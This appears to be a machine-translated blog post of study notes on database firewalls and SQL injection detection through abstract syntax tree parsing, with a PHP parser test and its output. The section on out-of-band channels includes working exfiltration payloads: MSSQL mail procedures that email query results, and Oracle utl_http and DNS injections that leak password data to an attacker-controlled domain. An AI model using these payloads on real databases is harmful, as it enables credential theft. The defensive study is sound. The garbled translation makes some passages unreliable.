SQL Injection Detection Based on AST abstract syntax tree (1)

Source: Internet
Author: User

This week, we will continue to focus on Database firewall knowledge:

If penetration is an attack, the database firewall is defensive. The first time I got in touch with this content, I went online to find some information, and found that the open-source project druid on git is java. I am decisive to download the Getting Started video, I learned the basic syntax of java again, but it is not difficult to learn java based on C and C #. Then I want to read the SQL Injection detection module and related materials in druid, here we will summarize the study work this week.




1. Related Materials

Http://baike.baidu.com/link? Url = sD57lAlRRV6pzwt9a4IYrXMM1jtJA6jXvQoukpSPJNIk9khWhUNiu5FPql-sO2rIQ874vGF3b8VsL9OBANKK6a

Http://files.cnblogs.com/LittleHann/%E5%9F%BA%E4%BA%8E%E8%AF%AD%E6%B3%95%E6%A0%91%E7%89%B9%E5%BE%81%E5%8C%B9%E9%85%8D%E7%9A%84SQL%E6%B3%A8%E5%85%A5%E9%98%B2%E6%8A%A4%E6%96%B9%E6%B3%95%E7%A0%94%E7%A9%B6%E4%B8%8E%E5% AE %9E%E7%8E%B0_%E7%9F%B3%E8%81%AA%E8%81%AA.pdf



2. Database firewall features

Baidu encyclopedia lists the core functions of 10 database Firewall Products. I personally think that there should be two categories of major functions:

I. Management and Audit Module

1. Connection monitoring: monitors all connection information, operations, and violations to the database in real time. The administrator can disconnect a specified connection. 2. Security Audit: The system can audit access to database servers. Including user name, program name, IP address, requested database, connection establishment time, connection disconnection time, traffic size, execution result, and so on. It also provides flexible log query and analysis functions and can survive reports. 3. Audit Probe: as a database firewall, the system can also serve as a data retrieval engine of the Database Audit System to send communication content to the audit system. 4. fine-grained permission control: Select, Insert, Update, Delete, object owner, and permission control based on tables, view objects, and columns. automatic SQL Learning: the risk control model based on the self-learning mechanism actively monitors database activities to prevent unauthorized database access, SQL injection, permission or role upgrades, and illegal access to sensitive data. 6. Transparent deployment: No need to change the network structure, application deployment, internal application logic, front-end user habits, etc.

Ii. Real-Time Detection and interception Module

Because the interception module should normally be connected to the entire communication Link, and the Database Link initiated from the web application server should be responded in real time (blocking or releasing ), this part requires high real-time performance, otherwise it will cause a performance bottleneck. For the real-time monitoring and interception modules, the core functions should be:

1. shield the channel for direct access to the database: the database firewall is deployed between the database server and the application server, blocking the direct access channel to prevent database attacks by the database hidden channel.

"Hidden channel" is also called "Out-of-Band communication (Out-Band Comunication )", it is an attack that uses unconventional channels to steal data.

Http://files.cnblogs.com/LittleHann/%E5% AE %89%E5%85%A8%E6%95%B0%E6%8D% AE %E5%BA%93%E9%9A%90%E8%94%BD%E9%80%9A%E9%81%93%E7%9A%84%E6%A0%87%E8%AF%86%E6%8A%80%E6%9C%AF%E4%B8%8E%E5% AE %9E%E4%BE%8B%E5%88%86%E6%9E%90.pdf

In penetration attacks, hackers can use the following out-of-band communication methods:

1) email

Microsoft sql sqlverSQL Mail(sqlserver 2000,2005,2008)Database Mail(sqlserver 2005,2008)

What hackers need to do is construct a method to extract desired information, package the data into e-mail, and insert it into the e-mail queue using special database functions. Then the email will appear in the attacker's mailbox (this is a two-step attack idea), for example:

EXEC sp_configure 'show advanced options', 1GORECONFIGUREGOEXEC sp_configure 'SQL Mail XPs', 1GORECONFIGUREGOexec master..xp_startmail;exec master..xp_sendmail @recipients = 'xxxxxxxxx@qq.com', @query = 'select @@version';


EXEC sp_configure 'show advanced options', 1GORECONFIGUREGOEXEC sp_configure 'SQL Mail XPs', 1GORECONFIGUREGOuse msdbgodeclare @b varchar(8000);select @b = @@version;exec dbo.sp_send_dbmail @profile_name = 'sql_mail',@recipients = 'xxxxxxxx@qq.com', @subject='system user again', @body = @b;



Databases like Oracle also provide two methods to execute HTTP requests:

By default, the UTL_HTTP, HTTPURI_TYPEUTL_HTTP, and HTTPURI_TYPE object types are authorized to public roles, which can be executed by all database users or through SQL injection.

Hackers can add out-of-band request statements in Payload injection to launch attacks:

Select 1 from dual where 1 = utl_http.request ('HTTP: // localhost/test/index. php? Data = '| (select username from dba_users where rownum = 1); or select 1 from dual where 1 = HTTPURI_TYPE ('HTTP: // localhost/test/index. php? Data = '| (select username from dba_users where rownum = 1). getclob ();

3) DNS

If the SQL query is written inside the URL, you can also use the Domain Name System (Domain Name System DNS) query to send data (up to 64 bytes ). The premise is that the attacker controls the DNS servers in the domain at this time.

select 1 from dual where 1=utl_http.request('http://www.'|| (select password from dba_users where rownum=1)  || '. orasploit.com/');

Using the HTTP mechanism, oracle will send this "fake" host name to DNS for resolution. In essence, this is the out-of-band data leakage.


2. secondary authentication: based on the original "connecting to the six-dollar group [Machine Fingerprint (cannot be forged), IP address, MAC address, user, application, time period]" Authorization unit, access to the database by applications must be authenticated by the database firewall and the database itself.

3. Attack Protection: detects SQL injection and buffer overflow attacks on databases in real time. And alarm or prevent attack behavior, and detailed information such as the time when the attack operation occurred, source IP address, login database user name, attack code, etc.


4. Precise SQL syntax analysis: a high-performance SQL semantic analysis engine that captures, recognizes, and classifies Database SQL statement operations in real time.

This article is also the focus of my current learning, that is, real-time AST (Abstract Syntax Tree) parsing of the SQL statements transmitted by the front-end Web application server, parses SQL statements of natural semantics into abstract, machine-understandable data structures, and prepares for the next attack detection.


3. My Understanding of AST Parsing

AST resolution is the SQL parsing module (often called SQL preprocessing) in the database firewall. It parses SQL statements and consists of the following three parts:

1) lexical parsing lexical Parsing is responsible for decomposing the original SQL statements that store a piece of connection to obtain independent words and organize them into word linked lists. 2) Syntax Parsing analyzes the syntax structure of the Word chain after lexical parsing based on the different features of the SQL syntax (Mysql, Oracle, and Sqlserver) of a specific database, construct the SQL syntax tree. 3) semantic analysis: Semantic Analysis analyzes the semantic features of the SQL statement based on the SQL syntax tree.
In the industry and academia, a syntax tree or similar syntax tree is widely used for SQL statement parsing, the reason is that SQL statements are a highly structured Language ), the "logical result set" and "subquery" in SQL statements make it easy to convert SQL statements into a "syntax tree" structure, the elements in the syntax tree form a strong dependency relationship.

The so-called strong dependency can be understood as follows:

1) select is a query command in SQL. It must be followed by a column name, number, or string (represented as a subnode in AST:

select 1,2 from dua;select "hello" from dual;selec user, password drom admin;

The string here does not necessarily refer to the native string. It can be a recursive structure, as long as it can produce string results. This is also a manifestation of SQL flexibility.

select concat(select user(), '--', database()) from dual;
2) where

The core idea of the where clause is the same. The where clause must receive a logical expression, which is a syntax. However, the construction process of this logical expression can be very flexible:

select 1,2,3 from admin where id=1;select 1,2,3 from admin where id=if(ascii(substr((select user()),1,1)=1),1,0);

3) order

The idea of order by is the same. In terms of syntax, it receives the serial number of a column name or list, but the construction process of this serial number can allow recursive construction, hackers often exploit this to insert Payload into the clause to perform "sensitive data extraction" or "Blind injection Reasoning"


Therefore, no matter how flexible the SQL statement changes in the actual business, its skeleton is still a strict tree structure. Therefore, naturally, AST parsing of SQL statements is the best practice at present.

4. AST parsing and Generation Process

Currently, there are many open-source SQL Syntax Parsing engines, which are listed below:

Http://code.google.com/p/php-sql-parser/wiki/ParserManual SQL Syntax Parsing engine based on PHP

Http://db.apache.org/derby/releases/release- Derby-java-based SQL Syntax Parsing Engine

Https://github.com/alibaba/druid/wiki/SQL-Parser druid --- Alibaba's open source project, based on java SQL Syntax Parsing, analysis, injection detection engine (the next series of learning notes will continue to learn it)


Build a test environment on your server:


Test code:

<?php     require_once('php-sql-parser.php');    $sql = "select name, sum(credits) from students where name='Marcin' and lvID='42509';";    echo $sql . "\n";    $start = microtime(true);    $parser = new PHPSQLParser($sql, true);     var_dump($parser->parsed);    echo "parse time simplest query:" . (microtime(true) - $start) . "\n"; ?>


Test cases:

select name, sum(credits) from students where name='Marcin' and lvID='42509';
Resolution result:
select name, sum(credits) from students where name='Marcin' and lvID='42509';array (size=3)  'SELECT' =>     array (size=2)      0 =>         array (size=6)          'expr_type' => string 'colref' (length=6)          'alias' => boolean false          'base_expr' => string 'name' (length=4)          'no_quotes' => string 'name' (length=4)          'sub_tree' => boolean false          'position' => int 7      1 =>         array (size=5)          'expr_type' => string 'aggregate_function' (length=18)          'alias' => boolean false          'base_expr' => string 'sum' (length=3)          'sub_tree' =>             array (size=1)              ...          'position' => int 13  'FROM' =>     array (size=1)      0 =>         array (size=10)          'expr_type' => string 'table' (length=5)          'table' => string 'students' (length=8)          'no_quotes' => string 'students' (length=8)          'alias' => boolean false          'join_type' => string 'JOIN' (length=4)          'ref_type' => boolean false          'ref_clause' => boolean false          'base_expr' => string 'students' (length=8)          'sub_tree' => boolean false          'position' => int 31  'WHERE' =>     array (size=7)      0 =>         array (size=5)          'expr_type' => string 'colref' (length=6)          'base_expr' => string 'name' (length=4)          'no_quotes' => string 'name' (length=4)          'sub_tree' => boolean false          'position' => int 46      1 =>         array (size=4)          'expr_type' => string 'operator' (length=8)          'base_expr' => string '=' (length=1)          'sub_tree' => boolean false          'position' => int 50      2 =>         array (size=4)          'expr_type' => string 'const' (length=5)          'base_expr' => string ''Marcin'' (length=8)          'sub_tree' => boolean false          'position' => int 51      3 =>         array (size=4)          'expr_type' => string 'operator' (length=8)          'base_expr' => string 'and' (length=3)          'sub_tree' => boolean false          'position' => int 60      4 =>         array (size=5)          'expr_type' => string 'colref' (length=6)          'base_expr' => string 'lvID' (length=4)          'no_quotes' => string 'lvID' (length=4)          'sub_tree' => boolean false          'position' => int 64      5 =>         array (size=4)          'expr_type' => string 'operator' (length=8)          'base_expr' => string '=' (length=1)          'sub_tree' => boolean false          'position' => int 68      6 =>         array (size=4)          'expr_type' => string 'const' (length=5)          'base_expr' => string ''42509'' (length=7)          'sub_tree' => boolean false          'position' => int 69parse time simplest query:0.31218290328979


As you can see, an SQL statement is split into several root nodes: SELECT, FROM, and WHERE. There are subnodes under the root node. The logical dependency between the root node and the subnode is formed.

Through SQL Syntax Parsing, we can get a well-structured AST (Abstract syntax tree), which can be used as input data for Injection Analysis and detection.



5. Priorities for next week

1) The analysis and injection detection of AST syntax tree are studied in depth in druid source code.

2) The current interception rules of druid cause certain false positives. Optimize the SQL interception rules of druid, analyze the SQL structure characteristics of aggressive SQL statements and normal business statements in depth, find out the syntactic logic differentiation points, and optimize rules from this perspective

3) consider whether the current analysis dimension can be extended for the current false positive alarms intercepted:

For example:

After finding the injection point, hackers generally use injection tools, scanners (sqlmap, haviji), and other tools for further injection detection and database detachment, the behavior shown in the scanner table is different from the normal business behavior in the time dimension.

4) for statements that cannot be improved, extract the logic mode of the Business SQL statement (the skeleton of the SQL statement) and add it to the druid whitelist to reduce or eliminate the current false positive.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.